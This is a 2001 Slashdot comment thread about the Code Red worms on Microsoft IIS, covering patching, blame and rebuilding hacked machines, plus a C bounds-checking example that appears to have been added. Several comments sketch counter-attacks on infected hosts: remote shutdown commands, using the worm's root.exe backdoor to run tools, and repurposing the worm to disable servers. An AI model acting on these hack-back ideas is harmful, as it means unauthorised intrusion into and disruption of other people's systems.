    the PCs of Road Runner customers using the Microsoft Windows NT Server or
    Microsoft Windows 2000 Server operating systems. Infected PCs may
    continue to flood the Internet and the Road Runner network with
    virus-generated messages (even without your being aware of it).

    Road Runner is working to alert all of its subscribers to this problem
    and to instruct them on where to find and install the patch necessary to
    eliminate the virus. In the meantime, Road Runner customers may
    experience slow network response, flashing data lights on their cable
    modems, and other symptoms (such as unusual port scan log activity or
    increased firewall activity) while Road Runner and the Internet community
    work to control the impact of this virus.

    IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER,
    PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE
    (www.microsoft.com/security) AND RESTART YOUR PC.

    IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOU
    ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

    We ask for your patience while Road Runner continues to work with the
    Internet community to address this virus.

    Thank you.

    Road Runner Security

    1. Re:And it keeps going by Tridus · · Score: 2

      No, its not installed by default.

      But it's so easy to install a trained monkey could do it. In 2k it's just "Add/Remove Programs" and hit a checkbox. It's more difficult in NT in my experience, I've had horrible experiences trying to install IIS4 with anything other than SP3 as the current service pack level. IIS4 is also part of the Option Pack, and not included in NT itself (that's IIS2, which afaik is not vulnerable to Code Red).

      They should be telling people who are running NT/2k of any variety to install the patch, that would go a lot farther towards solving the problem.

      --
      -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    2. Re:And it keeps going by reverius · · Score: 1

      Actually, the re-booting is quite significant to the process.

      The worm only stays resident in memory after you are infected. Therefore, you are instantly clean after a reboot. It _does_ not stay anywhere else except RAM, which is cleared when you reboot.

      However, the need for installing the patch is that you will be infected again within minutes (statistically) after the reboot, unless the patch is installed.

    3. Re:And it keeps going by bonzoesc · · Score: 2
      It must not be installed by default - I don't have it in my Services listing. Doesn't matter - if I need serving, I've already got Apache installed.

      And no, I don't exclusively use Linux. I *have* to play RollerCoaster Tycoon.

    4. Re:And it keeps going by RobYoung · · Score: 1
      customers using the Microsoft Windows NT Server or Microsoft Windows 2000 Server operating systems.

      So I guess the people who are running Windows 2K Pro think they are fine? Windows 2000 Professional includes IIS 5.0. But, it is not installed by default, if I remember correctly.

    5. Re:And it keeps going by Anonymous Coward · · Score: 0

      Funny, says nothing about linux in there.

    6. Re:And it keeps going by djocyko · · Score: 1

      IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER,
      PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE
      (www.microsoft.com/security) AND RESTART YOUR PC.


      So....let me get this right...I d/l the patch, then I reboot. It seems (RR and) Microsoft finds rebooting to be the solution to everything:

      What To Do If You Are Vulnerable?

      a. To rid your machine of the current worm, reboot your computer.


      then they say...

      b. To protect your system from re-infection: Install the patch as specified in the instructions.

      At least they got the INSTALL THE PATCH part...heh

  155. That script by Mike+Hicks · · Score: 2

    Unfortunately, I don't think that script will work. I don't have an IIS box to test on, but my NT 4.0 workstation will not shut down with that `rundll32 shell32.dll,SHExitWindowsEx 5' command. I get a dialog box to pop up saying ``Error in shell32.dll Missing Entry: SHExitWindowsEx''

    I have a PHP script set up to do a `net send %COMPUTERNAME%'. If I can find an FTP server with Microsoft's new tool, I may start downloading that with an FTP script and running it.

    However, I also heard that IIS doesn't run with many privileges at all on Win2k boxes. It may not be possible to do anything at all.

    1. Re:That script by Mike+Hicks · · Score: 2

      Heh.. I never realized that one. Good catch ;-)

      I haven't personally tried the `iisreset' trick -- I've heard it doesn't work. Not sure, though.

    2. Re:That script by Anonymous Coward · · Score: 0

      Not to mention the fact that if the script just shut down IIS, how does it expect to reboot the machine? Could be an either/or situation.

  156. Re:excuse me! by Anonymous Coward · · Score: 0
    Stupidity by sysadmins + stupidity by Microsoft definitely counts as an MS mess.

    Also, if you read above, many victims are not sysadmins but innocent people who thought it would be a great idea to run NT (or the boss thought it would be a great idea).

    Seriously, are you blaming all these people for being clueless? I would blame them for being deceived by Microsoft. It seems that NT, 2000, and XP are only safe for diligent, highly experienced, fully qualified professional sysadmins. Do you think that MS planned it this way?

  157. Re:Not the mess they made... by Shimmer · · Score: 1

    Somebody mod this puppy up. W2K is not installed by default on W2K Pro.

    -- Brian

    --
    The most rabid believers in American Exceptionalism are the exact same people whose policies are destroying it.
  158. About time! by supabeast! · · Score: 3, Informative

    " it also gives you an option to permanantly disable IIS..."

    About time Microsoft showed people how to secure a Windows web-server! Turn off the web daemon! *sigh*

  159. Re:Unforgivable! by Anonymous Coward · · Score: 0

    Smells trolly. Given the choice between having my machine flood others or be shutdown, I'd rather it be shut down.

    I'm guessing you've never been DoS'd? Its easy to make statements like yours when living in lala land.

  160. Re:Stop blaming microsoft by Trepidity · · Score: 2

    If you truly are an NT server admin then I pity you. While you spend half your day researching and applying patches to your servers, BSD and Linux admins get to play around with the really fun stuff.

    Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability. Patching sendmail hardly seems like "play[ing] around with the real fun stuff." Not to mention the recent BIND hole...

  161. Re:If you've had a corporate hit on your network.. by GC · · Score: 2, Informative

    > So it probably would be a good idea for anyone to send every host that comes in searching for default.ida at least one reboot command to make sure that patched machines don't bother us again.
    > The root.exe left in their scripts directory would be their own problem.


    No, this is another common misconception. The explorer.exe trojan makes Code Red ][ infected machines survive the reboot.

    Also I've seen many people expressing that they could stop the IIS service. I have tried this and it doesn't work.

    I've even seen another /. user set up a script to do this automatically. - He/She is using a similar technique to one that I've already tried. For some reason it doesn't work.

    Files on an infected machine can be accessed via http://lusers.ip.net/scripts/root.exe, but there are restrictions as to what you can do.

    The infected machines are Win2k (ie WINNT based) - if they're running NTFS then there are specific permissions on the file directory structure. I believe that this restricts what you can do with root.exe.

  162. Re:If you've had a corporate hit on your network.. by nick-less · · Score: 1
    > Then there is a nice little Vulnerable Server Scanner provided by the people at www.eeye.com.

    Did you ever check some infected machines that hit your logs with this tool? I tried, and lots of them were found as "unvulnerable". So better don't trust it too much...
  163. Comment removed by account_deleted · · Score: 3, Insightful

    Comment removed based on user account deletion

  164. Paid Bashing by Anonymous Coward · · Score: 0
    "My job is programming Windows boxes, so no, I'm not a paid basher."

    You merely make a living off of MS shortcomings, then. Because your income depends on MS products, you won't use better tools. And the more your servers crash, the more it proves your support staff is needed...

    1. Re:Paid Bashing by sqlrob · · Score: 1
      Unless of course, I'm someone with ethics.

      Sorry to disappoint, but I try my best to make sure support for my code isn't needed. And I use the tools I need for the job, which often means writing my own.

      And define "using better tools". If I write stuff for Windows shops that are unwilling to change to something else, what is a better tool? If I get what I need done with as much stability as is possible on the platform, rapidly, and to spec, what is wrong with my tool choice?

  165. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

    Granted, it is quite easy to create a malicious program in C. However, these exploits have been known since the '70s. Numerous tools are available to deal with these issues (e.g. ElectricFence). And if you like to do it yourself: it's not that difficult. If you need a 'low level language', deal with it correctly.

  166. Re:Liability for software defects by norton_I · · Score: 2

    There is a big difference between a "normal" EULA and the GPL:

    The GPL grants you the privilege of copying, redistributing, and making derivative works of copyrighted material, in exchange for agreeing to certain provisions. You only need to agree to the GPL if you want to do one of the above. When you buy GPL software, you are buying the software. If you so choose, the GPL provides you with a superset of the rights you automatically get by buying a copy.

    "Normal" EULAs attempt to specify how you can and can't use the software in any case. They claim that you haven't purchased a copy, and you don't have the right to use the software as you wish.

    Whether the courts would choose to recognize this distinction depends on how much corporate America bribes them.

    In any case, this has no direct bearing on the liability issue.

  167. Re:Not the mess they made... by Sethb · · Score: 3, Informative

    Looking through my logs, I think it's more likely that it is home users that are infected now; a lot of DSL users on dynamic IP addresses are hitting me.

    I haven't seen it posted here on Slashdot yet, but there's a neat little Java Applet (it's even GPL) over at:

    http://www.dynwebdev.com/codered/

    It auto-replies to any machine that tries an .ida exploit against you, popping up a Net Send message on the computer, so hopefully someone will notice and patch the machine...

    --
    When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
  168. excuse me! by gvsu_snow_lord · · Score: 0

    But since when does stupidity on the sysadmins' part count as an MS mess? I'm sorry, but all software has bugs. MS posted a fix for the exploit and few sysadmins used the patch. Then came Code Red, now Code Red II and III. (BTW, I am not an MS user at all.) The 'Mess' came from the lazy sysadmins.

    Now I have a question. All of you running a server who have logs of attempted infections, why not do the community some good? Shocker here, you're actually going to have to do something helpful... unheard of for Linux users. Take out your logs and track down the sysadmin for the servers who tried to infect you. Then let the sysadmin know they have Code Red. Maybe the sysadmins think they don't have the problem, or maybe if they get enough email they will take action.

    Just do something other than mocking!

    1. Re:excuse me! by gvsu_snow_lord · · Score: 0

      I would then blame the brain-dead fools who run NT, 2000, etc. They want to run the OS for some reason. They should then deal with the mess they wanted.

      The clueless people must read the newspaper, watch CNN, read online news, listen to the radio. I can excuse ignorance once. After that people have to own up to their mistakes... like not installing the patch after the first outbreak. Like not listening when the govt and MS held a press conference to plead with people to apply the patch.

  169. You missed the point by ZxCv · · Score: 1

    I'm not saying that every crash or whatever is the fault of 3rd-party drivers. I'm saying you're probably just as likely to experience a crash due to a problem in Windows as you are to experience a crash due to a faulty driver of some sort.

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  170. Letter from MS: by djocyko · · Score: 5, Funny

    From: Support@iis.microsoft.com
    To: Registered_Users@iis.microsoft.com
    CC:
    Subject: RE: IIS Code Red Worm Patch
    Attachment: Instructions.doc
    Body:

    Hi, how are you?

    We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructions in an easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

    If you have any advice on this file, please email us back!

    See you later!

  171. Microsoft Assumes... by Greyfox · · Score: 2
    That someone clever hasn't already written a bit of code that goes through their web logs and installs back orifice on all the compromised systems that have tried to scan them (over 3500 since last saturday, here.)

    Once your system has been compromised in this fashion, the only way to be sure is fdisk, format, and reinstall.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  172. rude link on main page. by jeffehobbs · · Score: 2, Informative

    Linking to a page that could potentially shut down/restart your machine without warning is rude, virus or not.

    ~jeff

    1. Re:rude link on main page. by Dahan · · Score: 1

      There is no way for that link to shut down or restart your machine. If you look at the script, it just prints a message if you link to it as default.ida. You have to have a query string for it to attempt to shut down IIS. And how's it gonna reboot your machine anyways, if it's already shut down IIS? That script obviously hasn't actually been tested :) (and it's not like it'd be terribly difficult to test if you had a NT box around... put IIS on it and wait a couple of minutes and I'm sure someone'll send it Code Red. Set your firewall to block outgoing packets on port 80 from that machine so it won't infect other machines).

    2. Re:rude link on main page. by Anonymous Coward · · Score: 0

      Here we go again.. Ever been DoS'd? No? I didn't think so.

      If someone was pointing a gun at your friend, would you just stand by and not attempt to help your friend? We're all friends here and we're all being shot at.

    3. Re:rude link on main page. by CentrX · · Score: 1

      Right, and allowing your machine to attack other machines is downright KIND!

      --

      "The price of freedom is eternal vigilance." - Thomas Jefferson
  173. Re:Stop blaming microsoft by Crixus · · Score: 3, Flamebait
    > I agree with you not to blame MICROS~1. Blaming them is like blaming a glass manufacturer for when a robber breaks a window, and steals your tv. Blame the damn virus writer! And blaming the sys admins is like blaming the owner of the house because he/she does not know that the glass they bought with the house is NOT bullet proof.

    No, no, no.

    When you buy a house, you know for a FACT that glass will break when hit with a hammer.

    The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

    Your analogy just doesn't do justice to the situation.

    Rich...

    --
    Ignore Alien Orders
  174. Re:Not the mess they made... by mpe · · Score: 3, Insightful

    Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.

    However, part of the problem is the use of huge monolithic programs, which attempt to do everything including the "kitchen sink". For quite a while with Windows we have been seeing what amount to exploits through "bells and whistles". Frequently where most people don't even know something is even there...

  175. Only gets SOME of 'em. by Ungrounded+Lightning · · Score: 2
    > OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?

    That only works if the server is infected by the version that installs the trojan.

    With a little more work one could take advantage of the fact that being infected by any version of the worm shows the server is vulnerable to the original buffer-overflow attack. So one could:

    Get a copy of the worm.

    Modify it to take the web server down (or whatever) rather than infecting it.

    Install a launcher for it as default.ida in the document root of your webserver.

    Note that by now any worm-infested machine - benign or backdoor version - may have several diverse rootkits installed. So it should be reinstalled (preferably with linux or a BSD and apache B-) ) rather than cleaned out and patched. And a machine infected with the benign worm, if merely crashed, will no doubt be brought back up and eventually infected with the backdoor-installing version.

    Some authors of retaliatory-strike software will no doubt choose to disable the web server on a more permanent basis - as by removing the unpatched DLL (along with the several backdoors the worm installs - see a patch tool here) - rather than merely shutting it down.

    While this may get them in trouble, choosing to reformat the drives would be a hostile action, since it might destroy unbacked-up parts of the web site. (It would also likely lead to the administrators installing a backup, complete with vulnerability. So it is a less effective retaliatory strike.)

    Finally: I do NOT recommend actually doing this, as it may be illegal. The more damaging alternatives certainly are illegal (and also unnecessary, given the availability of less damaging alternatives).

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  176. Re:Dumbest thing they could do by PurpleeDragon · · Score: 1

    Why post crap like this... This is what I mean... THE REINSTALL IDIOTS. The new MCSE/whatever people have spoken. Instead of figuring out what they did and correcting it, they say reinstall. YOU all need to get some education. Your reinstall skill is high enough; learn how to fix this shit. GOD, if you worked at my company, I'd fire your ass. FAST. Reinstall, pfffft... Do you reinstall your house once it became compromised? NO, you figure out what happened and then fix that. Oh, I am sorry, I forgot, all you low educated people JUST REINSTALL. If a script kiddie installs another backdoor you take it out, but that might require some real Administration work. So all you idiots just reinstall. lol, what a joke this environment's becoming. NO wonder there are 9 million exploits on NT; there are 9 million idiot administrators behind it.

  177. Re:Warhol Worm proposed: 15 minutes to total infec by cybersquid · · Score: 1

    Don't feel bad. In a few days, someone else will post this story and it will be accepted.

    That's what always seems to happen to me.

  178. Blame everyone bigger than you.! by tcc · · Score: 1, Troll

    I like that attitude (well, I don't). On one side people want to have their freedom and do whatever they want and hack their way in an OS, on the other side they want it to be perfect no bugs no loopholes no errors, and if there is, almost autopatching themselves.

    Fact #1: the world is full of clueless morons that will open any attachment they see because they see "click". EVEN IF YOU TELL THEM NOT TO DO IT.

    Fact #2: If this virus had hit Linux, or Apache... people wouldn't have made such a big deal about it. Granted, Linux WWW administrators normally are more responsible towards their servers and patch them at the first sign of a problem...

    But what does that have to do with the company itself? It's not Microsoft's fault if their userbase is composed of clueless morons... Yes, I can't bear the fact that *OVER ONE WEEK* later, some servers are still popping my light as if nothing was publicised... I can't understand how people can be that selfish and ignorant, but is that Microsoft's fault?? THE PATCH WAS AVAILABLE *BEFORE* this virus got out!

    I don't like Microsoft any more than the average Joe here, but what I hate even more is people bitching immaturely at every occasion they can get, making "bitching against Microsoft" like a crying baby after 2 years... you get used to it and it doesn't matter anymore... and that's not the effect it should have. Now people yell from roofs "Microsoft this, Microsoft that" and nobody listens! Why? Simple... it's called credibility, folks!

    --
    --- Metamoderating abusive downgraders since my 300th post.
    1. Re:Blame everyone bigger than you.! by mpe · · Score: 2

      Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server.

      You get this automatically with IIS; indeed you have to explicitly turn it off.

      You could configure Apache to use index server...

      But it doesn't do it by itself!

    2. Re:Blame everyone bigger than you.! by mpe · · Score: 2

      It also goes without saying that any product marketed primarily to morons must be foolproof and robust to the most extreme extent possible. Does IIS qualify here?

      Does any part of Windows qualify?

      All the difficult bits should have warning messages at install time, similar to the warnings on cigarette packages, or the warnings on drug packages against dangerous interactions, knowing full well that products may be used by a moron.

      Or even like the "cartoon" style warnings you find on domestic appliances. Together with "refer all servicing to qualified personnel". Problem is the latter is likely to be easier with something more like unix (or even VMS) than any version of Windows :)

    3. Re:Blame everyone bigger than you.! by Tony-A · · Score: 1

      > it's not microsoft's fault if their userbase are composed of clueless morons...
      When Microsoft has a monopoly on PC Desktops, it is Microsoft's fault. When that monopoly is used to spread into other areas, it is Microsoft's fault.

    4. Re:Blame everyone bigger than you.! by SuiteSisterMary · · Score: 2

      Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server. You could configure apache to use index server, I'm sure, and then code red would *gasp* AFFECT APACHE! By your logic, at least.

      --
      Vintage computer games and RPG books available. Email me if you're interested.
    5. Re:Blame everyone bigger than you.! by rambot · · Score: 1

      You're talking but you're not saying anything. We all know M$ sucks. We all know there are tons of M$ server admins who are idiots. What WE are bitching about is how WE are helpless to the degradation of the quality of the internet thanks to the ignorance of said parties! What WE are bitching about is how M$/IIS has more exploits found in 6 months than xNIX/Apache has in its entire existence. Why? Simple... it's called M$ sux0rz, folks!

  179. What I'd like to see... by abischof · · Score: 2

    I'd be interested in seeing how the sales of Code Red have correlated with the public's awareness of Code Red.

    --

    Alex Bischoff
    HTML/CSS coder for hire

    1. Re:What I'd like to see... by caferace · · Score: 1

      Look no further than: "Code Red soda bubbling away"

    2. Re:What I'd like to see... by cybermage · · Score: 1

      Hmmmmm.... almost makes you wonder about the source of the worm.

      <comic store guy>Best marketing campaign, ever.</comic store guy>

  180. Dumbest thing they could do by Talla · · Score: 5, Insightful

    When a box has been cracked, you need to do a complete reinstall, as you can never know what backdoors have been installed. Sure, you can remove RCII, but while it was active, it would only take even the dumbest script kiddie a couple of requests to install another backdoor.

    1. Re:Dumbest thing they could do by Trepidity · · Score: 2

      I still think it's better than nothing - many people simply *won't* wipe and reinstall, especially if it's not a corporate server, but just a small personal website in which security isn't exactly the number one concern. At least this tool will do a more thorough job than the manual attempts to clean up that would've happened otherwise.

    2. Re:Dumbest thing they could do by snake_dad · · Score: 2

      And, depending on how much ethernet snooping the rooted box can do, change all passwords that may have been seen on that segment, and the passwords of the machine itself. The password database might have been taken as well. Maybe this will not affect a webserver, but the same passwords might be used on other machines and/or services. No backdoors necessary...

      --
      karma capped .sig seeking available Slashdot poster for long-term relationship.
    3. Re:Dumbest thing they could do by GrumpyOldManager · · Score: 3, Interesting

      You are absolutely right. This tool probably couldn't detect secondary changes made to the machine's binaries.

      We have a policy of formatting the hard drive and reinstalling the OS once a machine has been compromised. This policy applies to any OS we run. To make it easy we've automated the process. To test the process we reinstall all of the machines on a regular basis, even servers. We spent some time years ago convincing vendors like RedHat that this was a useful thing (think jumpstart).

  181. Re:Here's how open source would be better... by reflective+recursion · · Score: 1
    These are not facts. Where is your evidence? Sources? Where?

    Sure everyone has access to the source code. But you forgot one important detail: not everyone is a programmer. It does not matter a single iota whether grandma has access to the source code or not. It does matter that she has secure software.

    > Fact: that "people with infected IIS are not admins" is irrelevant.

    No it's not. I was pointing out that people with the virus are ignorant end-users. Not the technical elite who know what source code is and what to do with it. Your quote about Microsoft's market position is what's irrelevant.

    You seem to have missed the issue totally. I am not arguing Microsoft has secure software. I am arguing proprietary software does not equal insecure, and open source does not equal secure. That is all. I am not defending Microsoft in the least. What I am defending is the numerous secure proprietary software out in the world. From small software shops to large corporations. From decades past to decades in the future.

    > Fact: While it is indeed not always true that people are paid to fix free software, the exact same thing is the case for proprietary software.

    If the software shop refuses to fix a security problem then you look like a complete dumbass to continue to use their software. Do yourself a favor and get a vendor who cares. I'm assuming you live in America and buy into the idea of free market. If you do not agree that the market is regulated by consumer demand, then you are complaining in the wrong forum.

    > Whereas, if Microsoft decides, as it surely will down the road, to stop paying its programmers to fix IIS, or Windows 2000, or DOS 5.whatever, you'll be out of options if you have failed to follow the M$-recommended upgrade path.

    I'm sorry to hear that. Buy a new computer, perhaps? One that can run the newer software. Again, you are bashing Microsoft with "M$." Let's not throw jealousy into the argument. Everyone knows Microsoft has money, why keep repeating it.

    > Fact: Red Hat does not, and has never, represented the security-conscious administrator's #1 choice for a default system installation of GNU/Linux.

    And what, the original poster gets away with implying Microsoft is representative of the security-conscious? Come on now, no double standards. I also never said Red Hat was the #1 choice for the security-conscious. I could just as well argue against Slackware, which is updated very rarely (which the original poster understood as a sign of security).

    > Challenge: name three vendors from which you can obtain the Microsoft Windows 2000 or Windows NT kernel in a distribution as fundamentally different from Microsoft's as Debian's, or SuSE's, is from Red Hat's.

    Challenge: name one vendor who will sell me a Honda Accord 2001 other than Honda. No. That is a Ford Taurus, and my what a piece of shit it is.

    Okay, this is just too irrelevant in the discussion of security. I'm not arguing for bloat or any of that intellectual property nonsense. The issue at hand is security. I say the open source system does not produce software that is more secure than proprietary. Likewise, proprietary can be very insecure compared to certain, specific, open source software packages. Your lesson for today: learn there are other proprietary software vendors than Microsoft. I was only using MS because this thread is about their product specifically. The original poster implied that OS was inherently more secure than proprietary, and I still refuse to accept his or your reasoning.
    --
    Dijkstra Considered Dead
  182. Re:Not the mess they made... by Swami · · Score: 1
    > I for one expect use of IIS to drop as a consequence of the Code Red...
    Well, we can just have a look at http://netcraft.com/survey/ over the next few months to see if you are right. But that isn't the current trend. I for one wonder whether customers of Netcraft's security services are getting their money's worth.
  183. Re:Not the mess they made... by NeoMage · · Score: 1

    Hahah, that IBM guy is now on "the hit list".

  184. Re:Warhol Worm proposed: 15 minutes to total infec by Anonymous Coward · · Score: 1, Interesting

    Prediction: before the year is out, you will see a "worm kernel" that incorporates thought-out techniques like this, with a modular interface for plugging in the latest exploits.

    At that point, all you will need to do is take the latest remote-exec exploit, put a wrapper on it so it can talk to the worm kernel, and package it up.
    You might have to write your own interesting payload to actually do the auxiliary stuff ("hacked by chinese"), but I imagine dedicated black hat types will have a few things ready to go at all times.

    Once this becomes as common as the virus creation lab (chiba city!), the time to infection after something new gets posted to bugtraq will become unbelievably small.

  185. Re:Stop blaming microsoft by uchian · · Score: 1

    Remember that in C you have pointers as well as arrays, and that they are pretty much interchangeable.

    Not only would you have to keep an eye on whether a pointer is in a viable array or not, but how about if it moves to dynamically allocated memory? Could still be valid, but how are you going to check efficiently every time a pointer is accessed? How about if a pointer is of type char, and it moves into a memory area that has been allocated as type float? Should this be an error? How about if the programmer wanted to do this?

    Methinks that adding bounds checking to C would be more expensive than you think.

    And remember, off-screen bitmap drawing makes great use of pointers and arrays, and because bounds checking effectively removes the programmer's ability to specify when checks should happen, they would happen whenever they _might_ be necessary - i.e. a lot of them would be redundant. All of this happening in the innermost loops of your bitmap drawing routines.

    Now _that_ would be slow!
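Comments 165 and 185 above disagree over whether bounds checking in C is cheap ("not that difficult") or prohibitively expensive (a check on every pointer access in the innermost loops). The block below is an added example, not code from any poster in this thread, of the "fat pointer" technique: every pointer carries the bounds of the object it points into, pointer arithmetic keeps those bounds, and each dereference is checked against them (a different approach from ElectricFence's guard pages). It counts the checks it performs so the cost argument can be measured rather than guessed. The type and function names (`fatptr`, `fp_*`, `demo_*`), the counters and the 25-byte sample string are this example's own constructions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fat pointer: raw base address plus the bounds of the object
 * it points into, and the current offset within that object.  The names
 * are this example's own, not from any library. */
typedef struct {
    unsigned char *base;   /* start of the object */
    size_t len;            /* object size in bytes */
    size_t off;            /* where inside the object this pointer sits */
} fatptr;

/* Counters so the overhead can be measured: one check per dereference. */
static unsigned long g_checks = 0;   /* bounds checks performed */
static unsigned long g_faults = 0;   /* accesses refused */

static fatptr fp_make(void *obj, size_t len)
{
    fatptr p;
    p.base = (unsigned char *)obj;
    p.len = len;
    p.off = 0;
    return p;
}

/* Pointer arithmetic: p + n still refers to the same object, so the
 * bounds travel with it.  A negative result wraps and fails the check. */
static fatptr fp_add(fatptr p, ptrdiff_t n)
{
    p.off = (size_t)((ptrdiff_t)p.off + n);
    return p;
}

/* The access [off, off + size) must lie inside [0, len). */
static int fp_check(fatptr p, size_t size)
{
    g_checks++;
    if (p.off > p.len || size > p.len - p.off) {
        g_faults++;
        return 0;
    }
    return 1;
}

static int fp_write(fatptr p, const void *src, size_t size)
{
    if (!fp_check(p, size))
        return 0;
    memcpy(p.base + p.off, src, size);
    return 1;
}

static int fp_read(fatptr p, void *dst, size_t size)
{
    if (!fp_check(p, size))
        return 0;
    memcpy(dst, p.base + p.off, size);
    return 1;
}

/* strcpy() on top of the checked pointer: copies byte by byte including the
 * NUL and stops at the first refused write.  Returns bytes actually stored. */
static size_t checked_strcpy(fatptr dst, const char *src)
{
    size_t n = 0;
    for (;;) {
        if (!fp_write(fp_add(dst, (ptrdiff_t)n), &src[n], 1))
            return n;
        if (src[n] == '\0')
            return n + 1;
        n++;
    }
}

/* The classic overflow: a 25-byte constructed sample (24 'A's + NUL) into a
 * 16-byte stack buffer.  Plain strcpy() would write 9 bytes past the end;
 * the checked copy stores exactly 16 and refuses the 17th. */
static size_t demo_overflow_blocked(void)
{
    char buf[16];
    const char *sample = "AAAAAAAAAAAAAAAAAAAAAAAA";
    return checked_strcpy(fp_make(buf, sizeof buf), sample);
}

/* Comment 185's char-pointer-into-a-float case: byte reads anywhere inside
 * the 4-byte object are fine, a 4-byte read at offset 1 is refused.
 * Returns 1 when the checker behaves that way. */
static int demo_float_view(void)
{
    float f = 1.5f, whole = 0.0f;
    unsigned char byte = 0;
    fatptr p = fp_make(&f, sizeof f);
    int ok_byte   = fp_read(fp_add(p, 3), &byte, 1);
    int ok_whole  = fp_read(p, &whole, sizeof whole);
    int bad_whole = fp_read(fp_add(p, 1), &whole, sizeof whole);
    return ok_byte && ok_whole && !bad_whole && whole == 1.5f;
}

/* Inner-loop cost, measured: filling n ints performs exactly n checks. */
static unsigned long demo_checks_in_loop(size_t n)
{
    int arr[64];
    unsigned long before = g_checks;
    fatptr p = fp_make(arr, sizeof arr);
    size_t i;
    if (n > 64)
        n = 64;
    for (i = 0; i < n; i++) {
        int v = (int)i;
        fp_write(fp_add(p, (ptrdiff_t)(i * sizeof v)), &v, sizeof v);
    }
    return g_checks - before;
}

int main(void)
{
    printf("checked strcpy stored %zu bytes into a 16-byte buffer\n", demo_overflow_blocked());
    printf("float view behaves as expected: %d\n", demo_float_view());
    printf("checks for a 64-int fill: %lu\n", demo_checks_in_loop(64));
    printf("total checks %lu, refused accesses %lu\n", g_checks, g_faults);
    return 0;
}
```

The counter shows exactly what comment 185 objects to: one check per element inside the fill loop, even though the bounds never change during it. Whether that matters depends on the compiler's ability to hoist or eliminate checks whose outcome is known at compile time; the copy-until-NUL case, where the trip count depends on data, is the one that genuinely needs a check per byte, and it is also the case that produced the Code Red overflow.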

  186. EXACTLY [Re:Why no lawsuits?] by rm3friskerFTN · · Score: 2, Interesting
    As I posted earlier [strange ... did someone "astroturf MOD" it to -1?]

    QUESTION: If Joe/Jane Consumer running whatever OS/Apps that exist suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???

    IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server. Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.

    --

    I believe Juanita

  187. Re:Stop blaming microsoft by ZxCv · · Score: 1

    I really figured this to be a joke and therefore, this guy to be a programmer (or at least mildly familiar with C)...

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  188. Re:FUD ALERT by sqlrob · · Score: 2, Interesting
    > An attacker would have to already have access to the machine in order to exploit the broken sequencing.

    No, they'd need access to the subnet, not the machine. The security issue isn't with the machine that was patched, but the machines it communicates with.

    There's also a 6a, which is why I wasn't sure whether it was 5 or 6.

    I don't know how much the issue is "new security holes" from the patch but "will it still work?". Look at 5->5a, 6->6a, DX8->DX8a, 3(!) attempts to fix that hole in Exchange, etc. Every MS patch needs to be regression tested on a non production box before being really attempted. It's too dangerous to do otherwise. It's also too dangerous not to immediately patch now as well. SNAFU.

  189. Re:Not the mess they made... by Anonymous Coward · · Score: 0

    I would disagree... not all 'admins' had the proper information given to them in a timely manner for them to patch. It's a backdoor (one of many I might add) that Microsoft has decided to leave unchecked and unpatched for some time. They've done this numerous times... don't overlook the past OSes they've released with poor port security. Microsoft is just a poor developer. Why should the people running the software do the work? It's something that should have been addressed long before it became a problem of this magnitude. Of course, anyone who knows wouldn't be using a Windows product as their webserver (except for poor hapless home users), but these are issues that MS should be fixing... and they never do... one of these days Microsoft WILL pay for their poor products.

  190. They might as well call it AOL... by Anonymous Coward · · Score: 0

    It's a little late. They certainly waited long enough for AT&T to use it as an excuse to permanently cripple my cable modem. What can I possibly do? I'm too far away from the CO for DSL, and it costs almost twice as much.

    Does blocking incoming 80 even slow this crap down? The AT&T cable modem network must have reached saturation almost immediately... so it's not like they can protect "those who haven't got it yet". And those still infected will attack other networks one out of eight times. Until some doofus of an engineer is inspired to block outgoing port 80, that is...

  191. Running it Scared by newimprovedmedia · · Score: 1

    This silly post really needs no reply, reading it is enough to argue against it.

    The GPL GNU license is the real strength behind Linux.

    I think everyone would agree that MS is afraid of the Free Software Foundation.

    It is true that no OS runs itself, and that system administration is partly to blame, but if this software were created in an open environment the weakness would have been spotted earlier. much earlier.

    It is the attitude of computer users who want to make a better OS and share the information with the world, instead of making a lot of money, that scares a company that considers its OS private property.

    Power to the people!

  192. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0
    > They released a patch well before Code Red. Get over it.

    Sure, it's not Microsoft's fault that their products continue to facilitate the spread of worms written by scr1p7 k1dd13z. It's not their fault that their own servers got infected with Code Red, well after it was known to them AND the general public.

